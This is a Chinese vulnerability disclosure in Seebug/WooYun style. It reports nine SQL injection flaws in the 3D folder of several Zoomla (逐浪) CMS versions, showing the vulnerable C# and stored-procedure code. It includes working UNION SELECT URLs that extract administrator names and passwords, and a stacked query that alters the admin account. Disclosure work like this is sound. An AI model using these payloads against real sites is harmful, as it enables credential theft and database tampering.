逐浪CMS一个文件夹9款注入姿势影响版本cms4.1 CMS2_x1.5 CMS6.0 CMS2_x1.4正式版

2014-05-10T00:00:00
ID SSV:94222
Type seebug
Reporter Root
Modified 2014-05-10T00:00:00

Description

简要描述:

影响版本Zoomla!cms4.1源码Zoomla!CMS2_x1.5源码 Zoomla!CMS6.0 Zoomla!逐浪CMS2_x1.4正式版 此文件夹注入点蛮多的 厂商需努力呀

详细说明:

文件目录3D 注入1 文件/3D/1sMail.aspx 问题阐述 ShopID 测试:

http://192.168.10.19:9992/3d/sMail.aspx?ShopID=1000000 union/**/ all select/**/ 1,2,'3','4','5','6','7','8','9',STUFF(adminPassword , 1, 0, AdminName),11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager

代码片段如下

if (base.Request.QueryString["ShopID"] != null) { string text = base.Request.QueryString["ShopID"].ToString(); this.HiddenField2.Value = text; DataTable dataTable = this.bdu.Select_Where(" Dutype=1 and DuShow=" + text, " * ", ""); if (dataTable.Rows.Count <= 0) { base.Response.Write("<script>alert('error');location.href='Default.aspx'</script>"); return; } this.txtSend.Text = dataTable.Rows[0]["DEmail"].ToString(); }

虽然 Select_Where方法调用的存储过程进行了参数化 但是咱们看如下代码片段

public DataTable Select_Where(string strSQL, string strSelect, string Orderby) { string cmdText = "PR_Duser_Select_Where"; SqlParameter[] array = new SqlParameter[3]; array[0] = new SqlParameter("@WhereCondition", SqlDbType.NVarChar, 500); array[0].Value = strSQL; array[1] = new SqlParameter("@SelectCondition", SqlDbType.NVarChar, 500); array[1].Value = strSelect; array[2] = new SqlParameter("@OrderByExpression", SqlDbType.NVarChar, 250); array[2].Value = Orderby; return SqlHelper.ExecuteTable(CommandType.StoredProcedure, cmdText, array); }

看存储过程 PR_Duser_Select_Where

SET @SQL = ' SELECT ' + @SelectCondition + ' FROM [dbo].[ZL_Duser] WHERE ' + @WhereCondition IF @OrderByExpression IS NOT NULL AND LEN(@OrderByExpression) > 0 BEGIN SET @SQL = @SQL + ' ORDER BY ' + @OrderByExpression END

显然程序中的参数化没起到任何作用
结果如下图

<img src="https://images.seebug.org/upload/201405/10113038f3b592bb6f586f1cbfdec92dee0dcd5a.jpg" alt="10-1.JPG" width="600" onerror="javascript:errimg(this);">

注:此处还有一个地方有注入(未利用)就是页面的DropDownList3下拉菜单的下拉事件 代码片段如下

protected void DropDownList3_SelectedIndexChanged(object sender, EventArgs e) { switch (this.DropDownList2.SelectedIndex) { case 0: this.GetUserData(this.mmbll.GetSend()); return; case 1: case 2: this.GetUserData(this.mmbll.GetABC(this.DropDownList3.SelectedValue, "1")); return; case 3: case 4: case 5: break; case 6: this.GetUserData(this.mmbll.GetSubscribe(this.DropDownList3.SelectedValue, "1")); break; default: return; } }

这里直接获取的this.DropDownList3.SelectedValue的值此值可在UI中修改 GetABC方法代码片段如下

public DataTable GetABC(string str, string state) { string str2 = ""; if (!string.IsNullOrEmpty(state)) { str2 = " and State='" + state + "'"; } return this.Select_Wheres(" Email like '" + str + "%' " + str2, " * ", " AddTime desc"); }

虽然页面中未显示DropDownList3这个控件页未成功利用 但是这个地方代码 希望官方还是能修改一下 注入2: 文件/3D/ShowForm.aspx 问题参数shopid 测试:

http://192.168.1.107:8885/3d/ShowForm.aspx?shopid=1000 union/**/ all select/**/ 1,2,'3','4','5','6','7','8','9',STUFF(adminPassword , 1, 0, AdminName),11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager

如下代码片段

if (base.Request.QueryString["ShopID"] != null) { DataTable dataTable = new DataTable(); this.shopid = base.Request.QueryString["ShopID"].ToString(); this.Hiddenshopid.Value = this.shopid; dataTable = this.bdu.Select_Where(" Dutype=1 and DuShow=" + this.shopid, " * ", ""); if (dataTable.Rows.Count &lt;= 0) { DataTable dataTable2 = this.bdsbll.Select_Where("D_ShowUserid=" + this.bubll.GetLogin().UserID.ToString(), "*", ""); int dShowUserID = DataConverter.CLng(dataTable2.Rows[0]["D_sid"]); if (dataTable2.Rows.Count &gt; 0) { M_DShowUser select = this.bdsbll.GetSelect(dShowUserID); select.D_ShopID = 0; select.D_Remark = ""; select.D_ShowX += 2; select.D_ShowY += 2; select.DupdateTime = DateTime.Now; this.bdsbll.GetUpdate(select); } base.Response.Write("&lt;script&gt;alert('对不起!商店还没有参展商!');window.history.go(-1);&lt;/script&gt;"); }

还是Select_Where方法出现问题 还是和第一个注入过程是一样的调取的存储过程也是一样的

<img src="https://images.seebug.org/upload/201405/101132410d445a9ec851d5998cf8135704031291.jpg" alt="20-1.JPG" width="600" onerror="javascript:errimg(this);">

注入3: 文件 3d/InDoor.aspx 也就是showform。aspx中嵌入的的页面 http://192.168.10.19:9992/3d/InDoor.aspx?ShopID=100;update// ZL_Manager set AdminName='WooyunDamo' where// AdminID=1-- 同样执行的同一个存储过程 结果如下图

<img src="https://images.seebug.org/upload/201405/101133160d02e9ff1a2dddf64a0ca444a4cf2c16.jpg" alt="30-1.JPG" width="600" onerror="javascript:errimg(this);">

注入4 文件:3d/InsertContext.aspx?type=Suser 个人原因 没有继续 但是看代码

if (base.Request.QueryString["type"] != null) { this.md.Caddtime = DateTime.Now; this.md.Cadduser = this.user.GetLogin().UserName; string text = base.Request.Form.ToString(); text = base.Server.UrlDecode(text); try { text = BaseClass.FromBase64String(text); } catch (Exception ex) { text = ex.ToString() + text; } if (text.IndexOf("$") &gt; -1) { string[] array = text.Split(new char[] { '$' }, StringSplitOptions.RemoveEmptyEntries); if (base.Request.QueryString["type"].ToString() == "Suser") { DataTable dataTable = this.bduser.Select_Where(" Dutype=1 and DuShow=" + array[1], " * ", ""); if (dataTable.Rows.Count &gt; 0) { this.md.Ctouid = DataConverter.CLng(dataTable.Rows[0]["DUid"].ToString()); } this.dt = this.bduser.Select_Where(" Duid=" + this.md.Ctouid, " * ", ""); if (this.dt.Rows.Count &gt; 0 && this.mduser.Dislogin == 0) { this.mduser.Dmessage = this.mduser.Dmessage + 1; } }

YY的想法:测试方式 form提交 然后转码 base.Server.UrlDecode(text); 然后FromBase64String(text);解码 然后解码之后的数据应该是介个样子的 理论数据 aaaa$bbbbb$ccccc$ddddd 然后代码过程则是根据$进行截取并且去除$ 那么这里控制array[1] 页就是bbbbb的值即可完成注入 调取的还是原来的方法 还是熟悉的存储过程 小弟本地未亲测 但是这个地方代码 希望官方还是能修改一下 注入5: 文件3D/showBgRe.aspx http://192.168.10.19:9992/3d/showBgRe.aspx?scen=100&ShopID=100 union// all select// STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager 还是原来的方法 还是熟悉的存储过程 结果如下图

<img src="https://images.seebug.org/upload/201405/1011345219f82ff0994d9c230e827ed643fb3b87.jpg" alt="50-1.JPG" width="600" onerror="javascript:errimg(this);">

注入6: 文件 3D/ShowChat.aspx http://192.168.10.19:9992/3d/ShowChat.aspx?type=2&uid=100 union// all select// STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager 还是原来的方法 还是熟悉的存储过程 结果如下图

<img src="https://images.seebug.org/upload/201405/10113608dc9add60bf9413c03bf477c1105aa02d.jpg" alt="60-1.JPG" width="600" onerror="javascript:errimg(this);">

注入7: 文件3D/ShowInfo.aspx 问题参数 ShopID http://192.168.10.19:9992/3d/ShowInfo.aspx?ShopID=100 union// all select// STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager 还是原来的方法 还是熟悉的存储过程 图只是用来显示密码用的给WOOYUN省空间就不上传了 注入8: 文件3D/ShowNote.aspx 问题参数 ShopID http://192.168.10.19:9992/3d/ShowNote.aspx?ShopID=100 union// all select// STUFF(adminPassword , 1, 0, AdminName),2,'3','4','5','6','7','8','9','aa',11,GETDATE(),13,14,15,GETDATE(),17,18,GETDATE(),20,'21','22' FROM ZL_Manager 还是原来的方法 还是熟悉的存储过程 图只是用来显示密码用的给WOOYUN省空间就不上传了 注入9: 文件3D/UpdateCoordinate.aspx 代码片段如下 if (base.Request.QueryString["type"] == "shopuser") { this.ShopUser(base.Request.Form.ToString()); this.UpdateDate(); } private void ShopUser(string shopid) {
if (shopid != "") { DataTable dataTable = this.bds.Select_Where(" D_ShopID=" + shopid, " D_ShowUserid, D_Remark", ""); string str = "false"; StringBuilder stringBuilder = new StringBuilder(); if (dataTable.Rows.Count > 0) { ......... } } }

YY想法: 问题方法Select_Where 存储过程 PR_DShowUser_Select_Where 利用方法还是一样 不过这次注意参数是Request.Form.ToString()

漏洞证明:

已经在上图了